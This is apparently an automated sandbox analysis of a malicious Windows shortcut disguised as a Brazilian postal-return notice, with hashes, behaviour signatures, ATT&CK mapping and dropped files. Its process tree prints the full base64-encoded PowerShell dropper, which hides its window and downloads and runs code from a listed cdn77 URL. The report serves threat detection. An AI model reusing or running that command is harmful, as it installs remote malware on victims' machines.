e92a42ea91893adf99b75d8715bdb36c92dfd09548996c0ed9ec5772cef7375f

General

Target

Mercadoria_Devolvida-Correios-GL44YWRK.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2644	powershell.exe
6	2644	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2644	powershell.exe
2644	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2644	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2508 wrote to memory of 2644	2508	cmd.exe	29
PID 2508 wrote to memory of 2644	2508	cmd.exe	29
PID 2508 wrote to memory of 2644	2508	cmd.exe	29
PID 2644 wrote to memory of 2460	2644	powershell.exe	30
PID 2644 wrote to memory of 2460	2644	powershell.exe	30
PID 2644 wrote to memory of 2460	2644	powershell.exe	30
PID 2460 wrote to memory of 2464	2460	csc.exe	31
PID 2460 wrote to memory of 2464	2460	csc.exe	31
PID 2460 wrote to memory of 2464	2460	csc.exe	31

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-GL44YWRK.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2508
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gtzftgr9.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA42C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCA42B.tmp"
      4⤵
      PID:2464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA42C.tmp

Filesize
1KB

MD5
81532ca52c0b15cd06f3627d8b660b0b

SHA1
64ad85ff7cf5dbb6e28a2a61d29b4c8c70faca74

SHA256
9c8d8e1ce0e91865d5a8bbb5bff3df181d4979c4e952045cdb256bf2e907fc35

SHA512
91cd5f5716d530f7bf534d51ec92e52b606240b6fed530cdc442b1edf81f72568799ef9808ee9395cb6f19af31a96e019d5634422ba30fdc4fc02948fde70135

Download Submit
C:\Users\Admin\AppData\Local\Temp\gtzftgr9.dll

Filesize
3KB

MD5
7efa9822b12540837c9bd8ce54eed627

SHA1
a7773126233290da7eeedc90d29146b5dbdad995

SHA256
d4a656b7806c9f71345625b36bce12f3b715aae97ac11fdc04318fad3d531950

SHA512
baef590480a7f08be62e104a4fc4cddd9c297871c5a5d072df2caf47c33118d1e4bef0e9933aa74d85b973318a065ee3bd1348a04c59ab72c2a71452c1659c20

Download Submit
C:\Users\Admin\AppData\Local\Temp\gtzftgr9.pdb

Filesize
7KB

MD5
c2e2243905b1552e5f03013805a426cc

SHA1
0bcca1f9d8d27520f665c9dbeed89784560d9f48

SHA256
9f54524939f4c1581a58d10101aa75e1f075f4bb08f43f0497e9c14bc143fbbd

SHA512
c3b3c5ee40252002b7250612be783e4d2dfc77efa78f47242052143bd470ff566477cfc571973a774f4ef957c38722857ba34189f07a26aeeadf4cf66f4a011f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA42B.tmp

Filesize
652B

MD5
58b2758b4ee40f60f3e7708d4da2a8bb

SHA1
3b48a47d864ea6bb6f1106e873cf991310cf77a2

SHA256
26aa2fc19e0b412d2f5b49d421b81de97bc977e958ef395565d5695ef558ad12

SHA512
98053858dc0d060e7d1b2193fd123703091f866849a48a92cb4f1fca1af4bd2e1371de4525944027206e6a20194ad8d606ffda4186ec64a613fa418d5d614a7e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gtzftgr9.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gtzftgr9.cmdline

Filesize
309B

MD5
d617fcd0d5ea8bce21839884a5144214

SHA1
373e63a4907025ae0c44ad7ff42bc1132aeb77ba

SHA256
eef5deafe3dae0d4cf0b634e897166a9b8a161ec5ce29a0da24b08326b4c4d8b

SHA512
2de2525d182e373d899fcd72a214bad7c1ec1b2bdf1b397a51d986eeea03148cdec8334010488c80a6fc2bfad1eaa72752fd5a18457c03df86e8ddcdd9472b41

Download Submit
memory/2644-42-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2644-48-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2644-45-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2644-43-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2644-38-0x000007FEF53CE000-0x000007FEF53CF000-memory.dmp

Filesize
4KB

Download
memory/2644-41-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2644-59-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2644-40-0x00000000022D0000-0x00000000022D8000-memory.dmp

Filesize
32KB

Download
memory/2644-39-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/2644-62-0x000007FEF5110000-0x000007FEF5AAD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing